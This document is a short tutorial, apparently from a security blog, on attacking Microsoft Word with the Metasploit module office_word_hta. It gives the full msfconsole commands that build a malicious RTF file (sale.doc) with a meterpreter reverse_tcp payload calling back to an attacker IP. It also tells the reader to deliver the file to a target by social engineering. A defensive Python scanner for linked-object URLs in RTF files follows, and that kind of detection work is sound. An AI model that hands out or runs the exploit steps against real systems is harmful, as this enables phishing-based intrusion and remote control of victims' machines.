For Kali Linux users, we performed this attack through Metasploit without using any Python script to generate the .rtf file, so the user only needs to update Kali Linux and load the Metasploit Framework to start this attack. This is a zero-day exploit with an excellent rating against an MS Office vulnerability, and it can very easily be used against any targeted Windows system.
Attacker: Kali Linux
Target: MS Office
Let’s breach!!
msfconsole
This module creates a malicious RTF file that, when opened in vulnerable versions of Microsoft Word, will lead to code execution. The flaw exists in how an OLE link object can make an http(s) request and execute HTA code in response. This bug was originally seen being exploited in the wild starting in Oct 2016. This module was created by reversing a public malware sample.
Object Linking and Embedding (OLE), which is based on the Component Object Model (COM), provides the majority of compatibility in Office, working with default and third-party applications to give Office users rich document features.
msf > use exploit/windows/fileformat/office_word_hta
msf exploit(office_word_hta) > set srvhost 192.168.1.8
msf exploit(office_word_hta) > set payload windows/meterpreter/reverse_tcp
msf exploit(office_word_hta) > set filename sale.doc
msf exploit(office_word_hta) > set lhost 192.168.1.8
msf exploit(office_word_hta) > exploit
This module will automatically generate a malicious .rtf file at /root/.msf4/local/sales.doc. It will also generate a link, and that link must be shared with the target using a social engineering method.
When the user opens that link and double-clicks (OLE event) on the .hta file, the attacker will receive a meterpreter session in the Metasploit framework.
meterpreter > sysinfo
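The module description above attributes the flaw to an OLE link object that makes an http(s) request when the document is opened. The following Python triage check is an added example, not code from the original post or from Metasploit: it decodes every \objdata group in an RTF file and reports remote URLs stored inside linked objects. The function names, the "suspicious" heuristic and the sample input (built around the documentation address 192.0.2.10) are assumptions made for this illustration.

```python
import binascii
import re

# RTF control words that mark a linked object / force a refresh when opened.
LINK_WORDS = (rb"\objautlink", rb"\objupdate")
# URLs may sit in the embedded object data as ASCII or as UTF-16LE text.
URL_ASCII = re.compile(rb"https?://[\x21-\x7e]{4,}")
URL_UTF16 = re.compile(
    rb"h\x00t\x00t\x00p\x00(?:s\x00)?:\x00/\x00/\x00(?:[\x21-\x7e]\x00){4,}")

def objdata_blobs(rtf: bytes):
    """Yield the decoded bytes of each \\objdata group (hex text in the RTF)."""
    for m in re.finditer(rb"\\objdata", rtf):
        end = rtf.find(b"}", m.end())
        chunk = rtf[m.end(): end if end != -1 else len(rtf)]
        # Whitespace and line breaks inside the hex run are dropped here.
        hexstr = re.sub(rb"[^0-9A-Fa-f]", b"", chunk)
        yield binascii.unhexlify(hexstr[: len(hexstr) & ~1])

def scan_rtf(rtf: bytes) -> dict:
    """Report link control words and remote URLs found inside object data."""
    urls = []
    for blob in objdata_blobs(rtf):
        urls += [u.decode("ascii") for u in URL_ASCII.findall(blob)]
        urls += [u.decode("utf-16-le") for u in URL_UTF16.findall(blob)]
    flags = [w.decode("ascii") for w in LINK_WORDS if w in rtf]
    # Heuristic (assumption): a linked object whose data names a remote URL.
    return {"link_flags": flags, "urls": urls,
            "suspicious": bool(flags) and bool(urls)}

def constructed_sample(url: str) -> bytes:
    """Constructed, inert test input: link control words plus a hex-encoded
    UTF-16LE URL. It is not a valid OLE object and cannot load anything."""
    data = b"\x01\x05\x00\x00" + url.encode("utf-16-le") + b"\x00\x00"
    return (rb"{\rtf1{\object\objautlink\objupdate{\*\objdata "
            + binascii.hexlify(data) + b"}}}")

if __name__ == "__main__":
    print(scan_rtf(constructed_sample("http://192.0.2.10:8080/default.hta")))
    print(scan_rtf(rb"{\rtf1 Quarterly report, see http://example.com}"))
```

A hit is a reason to quarantine the file and inspect it further; plain URLs in the document body are ignored because only object data is decoded.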